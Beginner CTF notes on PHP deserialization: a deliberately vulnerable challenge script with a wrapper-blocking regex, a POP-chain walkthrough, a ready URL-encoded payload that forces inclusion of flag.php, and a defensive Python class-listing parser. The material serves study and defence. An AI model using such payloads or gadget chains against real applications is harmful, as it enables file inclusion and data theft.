Beginner web security notes, written in whatever order things come to mind

PHP-based deserialization vulnerabilities

For some challenges you can write and run your own PHP code to generate the deserialization payload and then find the flag.

PHP serialization

Because PHP destroys objects once a script finishes executing, serialization was introduced to keep an object around for the long term; the next time it is needed, you only have to unserialize it.

Its purpose is to make data easier to transmit and store; JSON exists for the same reason, to make passing data around convenient.

I found a very good article on this: PHP反序列化从初级到高级利用篇 (PHP deserialization, from basic to advanced exploitation) by fish_pompom on 博客园 (cnblogs).

Practical example

<?php
if (!isset($_GET['xusheng'])) {
?>
<html>
<head><title>Reward</title></head>
<body style="font-family:sans-serif;text-align:center;margin-top:15%;">
<h2>
想直接拿奖励?
</h2>
<h1>
尔要试试我宝刀是否锋利吗?
</h1>
</body>
</html>
<?php
    exit;
}
error_reporting(0);
ini_set('display_errors', 0);
?>
<?php
// flag.php
// Invade our territory and we will surely strike you down!
class GuDingDao {
    public $desheng;
    public function __construct() {
        $this->desheng = array();
    }
    public function __get($yishi) {
        echo "__get";
        $dingjv = $this->desheng;
        $dingjv();
        return "下次沙场相见, 徐某定不留情";
    }
}

class TieSuoLianHuan {
    protected $yicheng;
    public function append($pojun) {
        echo "append";
        echo $pojun;
        include($pojun);
    }
    public function __invoke() {
        echo "__invoke";
        $this->append($this->yicheng);
    }
}

class Jie_Xusheng {
    public $sha;
    public $jiu;
    public function __construct($secret = 'reward.php') {
        $this->sha = $secret;
    }
    public function __toString() {
        echo "__toString";
        return $this->jiu->sha;
    }
    public function __wakeup() {
        echo "__wake";
        if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->sha)) {
            echo "你休想偷看吴国机密";
            $this->sha = "reward.php";
        }
    }
}

echo '你什么都没看到?那说明……有东西你没看到<br>';
if (isset($_GET['xusheng'])) {
    @unserialize($_GET['xusheng']);
} else {
    $a = new Jie_Xusheng;
    highlight_file(__FILE__);
}
// With this iron chain cast, Jiangdong's natural barrier is unbreakable!

Jie_Xusheng's __wakeup (preg_match() casts $this->sha to a string) → Jie_Xusheng's __toString (reads $this->jiu->sha on an object that has no such property) → GuDingDao's __get (calls $this->desheng as a function) → TieSuoLianHuan's __invoke → TieSuoLianHuan's append (include of $yicheng)

The serialized payload is constructed as follows (URL-encoded):

O%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3%3A%22sha%22%3BO%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3%3A%22sha%22%3Bs%3A10%3A%22reward%2Ephp%22%3Bs%3A3%3A%22jiu%22%3BO%3A9%3A%22GuDingDao%22%3A1%3A%7Bs%3A7%3A%22desheng%22%3BO%3A14%3A%22TieSuoLianHuan%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00yicheng%22%3Bs%3A8%3A%22flag%2Ephp%22%3B%7D%7D%7Ds%3A3%3A%22jiu%22%3BN%3B%7D
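An added example, not from the original post: a small Python parser for PHP's serialization format, run over a constructed, URL-decoded copy of the chain above. It shows why the payload reads the way it does (nested `O:` objects, `N;` for the null `jiu`, and the `\0*\0` prefix that PHP puts on the protected `yicheng`) and, from the defender's side, how to list the classes a blob would instantiate before it ever reaches `unserialize()`.

```python
from collections import namedtuple
PhpObject = namedtuple('PhpObject', 'cls props')   # class name + {property: value}
# Constructed sample: the chain above, URL-decoded. PHP mangles the protected
# property yicheng to "\0*\0yicheng" (10 bytes), which is the %00*%00 in the payload.
SAMPLE = ('O:11:"Jie_Xusheng":2:{s:3:"sha";O:11:"Jie_Xusheng":2:{s:3:"sha";'
          's:10:"reward.php";s:3:"jiu";O:9:"GuDingDao":1:{s:7:"desheng";'
          'O:14:"TieSuoLianHuan":1:{s:10:"\x00*\x00yicheng";s:8:"flag.php";}}}'
          's:3:"jiu";N;}')

def prop_name(raw):
    """Undo PHP name mangling: NUL*NULx is protected x, NULOwnerNULx is private x."""
    if raw.startswith('\x00*\x00'):
        return 'protected:' + raw[3:]
    return 'private:' + raw[1:].replace('\x00', '::', 1) if raw[:1] == '\x00' else raw

def parse(data, pos=0):
    """Parse one value (N, s, O) at pos; return (value, offset after it)."""
    t = data[pos]
    if t == 'N':                                  # N;
        return None, pos + 2
    if t == 's':                                  # s:<len>:"<bytes>";  the length, not the quotes, delimits
        colon = data.index(':', pos + 2)
        start, n = colon + 2, int(data[pos + 2:colon])
        return data[start:start + n], start + n + 2
    if t == 'O':                                  # O:<len>:"<Class>":<k>:{<key><value>...}
        colon = data.index(':', pos + 2)
        n = int(data[pos + 2:colon])
        cls, p = data[colon + 2:colon + 2 + n], colon + n + 3   # p -> the ':' before <k>
        brace = data.index('{', p)
        count, pos, props = int(data[p + 1:brace - 1]), brace + 1, {}
        for _ in range(count):
            key, pos = parse(data, pos)
            val, pos = parse(data, pos)
            props[prop_name(key)] = val
        return PhpObject(cls, props), pos + 1     # skip the closing '}'
    raise ValueError(f'unsupported type {t!r} at offset {pos}')

def classes_in(node, found=None):
    """Every class name the blob would instantiate, outermost first."""
    found = [] if found is None else found
    if isinstance(node, PhpObject):
        found.append(node.cls)
        for v in node.props.values():
            classes_in(v, found)
    return found

def unexpected_classes(serialized, allowed):
    """Classes the blob names that are not on the allow-list: reject before unserialize()."""
    return [c for c in classes_in(parse(serialized)[0]) if c not in allowed]
```

In PHP itself the equivalent guard is the `allowed_classes` option of `unserialize()` (PHP 7 and later): any class not on that list is restored as `__PHP_Incomplete_Class`, so none of its magic methods run and a chain like the one above never starts.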